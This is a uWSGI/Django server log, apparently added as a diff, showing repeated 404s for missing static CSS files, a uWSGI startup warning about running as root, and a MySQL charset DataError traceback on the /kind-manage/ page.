/static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1141/1442] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:07:03 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1142/1443] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:07:03 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1143/1444] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:07:03 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1144/1445] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:07:03 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 29 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1145/1446] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:07:03 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1146/1447] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:07:03 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1147/1448] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:07:03 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1148/1449] 219.228.146.156 () {48 vars in 1032 bytes} [Thu Jan 14 09:07:17 2021] POST /announcement/? => generated 27 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1149/1450] 219.228.146.156 () {40 vars in 937 bytes} [Thu Jan 14 09:07:19 2021] GET /announcement/ => generated 8247 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1150/1451] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:07:20 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1151/1452] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:07:20 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1152/1453] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:07:20 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1153/1454] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:07:20 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1154/1455] 219.228.146.156 () {38 vars in 872 bytes} [Thu Jan 14 09:07:20 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1155/1456] 219.228.146.156 () {38 vars in 852 bytes} [Thu Jan 14 09:07:20 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1156/1457] 219.228.146.156 () {38 vars in 928 bytes} [Thu Jan 14 09:07:21 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1157/1458] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 09:07:21 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1158/1459] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 09:07:21 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1159/1460] 219.228.146.156 () {48 vars in 1029 bytes} [Thu Jan 14 09:07:26 2021] POST /announcement/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1160/1461] 219.228.146.156 () {40 vars in 935 bytes} [Thu Jan 14 09:07:26 2021] GET /announcement/ => generated 7421 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1161/1462] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 09:07:27 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1162/1463] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 09:07:27 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1163/1464] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 09:07:27 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1164/1465] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 09:07:27 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1165/1466] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 09:07:27 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1166/1467] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 09:07:27 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1167/1468] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 09:07:27 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1168/1469] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 09:07:27 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1169/1470] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 09:07:27 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1170/1471] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 09:09:32 2021] GET /kind-manage/ => generated 7366 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1171/1472] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:09:33 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1172/1473] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:09:33 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1173/1474] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:09:33 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1174/1475] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:09:33 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1175/1476] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:09:33 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1176/1477] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:09:33 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1177/1478] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:09:33 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1178/1479] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:09:33 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1179/1480] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:09:33 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +*** Starting uWSGI 2.0.19.1 (64bit) on [Thu Jan 14 17:14:17 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 14 January 2021 03:06:44 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-8-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: /www/wwwroot/master +detected binary path: /www/wwwroot/master/pyweb/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 3874 +your memory page size is 4096 bytes +detected max file descriptor number: 100001 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +probably another instance of uWSGI is running on the same address (0.0.0.0:8000). +bind(): Address already in use [core/socket.c line 769] +[pid: 11057|app: 0|req: 1180/1481] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:14:24 2021] GET /kind-manage/ => generated 7366 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1181/1482] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:14:24 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1182/1483] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:14:24 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1183/1484] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:14:24 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1184/1485] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:14:25 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1185/1486] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:14:25 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1186/1487] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:14:25 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1187/1488] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:14:25 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1188/1489] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:14:25 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1189/1490] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:14:25 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB0\\x8F\\xE6\\x97\\xB6...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB0\\x8F\\xE6\\x97\\xB6...' for column 'k_name' at row 1") +[pid: 11057|app: 0|req: 1190/1491] 219.228.146.156 () {48 vars in 1027 bytes} [Thu Jan 14 09:14:36 2021] POST /kind-manage/ => generated 206934 bytes in 105 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1191/1492] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 09:14:38 2021] GET /kind-manage/? => generated 7366 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1192/1493] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:14:38 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1193/1494] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:14:38 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1194/1495] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:14:38 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1195/1496] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:14:38 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1196/1497] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:14:38 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1197/1498] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:14:38 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1198/1499] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:14:38 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1199/1500] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:14:38 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1200/1501] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:14:38 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1201/1502] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:16:45 2021] GET /kind-manage/? => generated 7366 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1202/1503] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:16:48 2021] GET /kind-manage/? => generated 7366 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1203/1504] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:16:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1205/1506] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:16:50 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1206/1507] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:16:50 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1207/1507] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:16:50 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1207/1508] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:16:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1208/1509] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:16:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1209/1510] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:16:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1210/1511] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:16:50 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1211/1512] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:16:50 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1212/1513] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:16:51 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1213/1514] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:16:52 2021] GET /kind-manage/ => generated 7366 bytes in 10 